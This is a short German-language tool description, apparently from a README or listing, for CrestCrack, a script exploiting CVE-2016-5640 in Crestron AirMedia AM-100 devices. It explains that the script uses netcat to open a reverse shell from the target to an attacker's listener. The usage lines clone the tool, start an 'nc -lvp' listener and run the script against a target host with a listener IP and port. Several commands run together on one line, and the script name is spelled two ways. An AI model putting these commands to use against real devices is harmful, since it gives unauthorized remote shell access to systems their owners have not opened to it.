
Exploitiert CVE-2016-5640 / CLVA-2016-05-002 gegen Crestron AM-100
CrestCrack ist ein einfaches Skript, das CVE-2016-5640 / CLVA-2016-05-002 in der Crestron AirMedia AM-100 (v1.1.1.11 - v1.2.1) ausnutzt. Bei Angabe von Argumenten nutzt CrestCrack netcat, um eine Reverse Shell zwischen Ihrem Ziel und einem netcat-Listener Ihrer Wahl zu erstellen.
git clone https://github.com/vpnguy/CrestCracknc -lvp 1337./crestcrack.py https://targethost 255.255.255.255 1337./crescrack.py [Ziel-Host] [Listener-IP] [Listener-Port]
./crescrack.py https://targethost 123.123.123.123 3311
Cylance Vulnerability Disclosure
--help-Ausgabe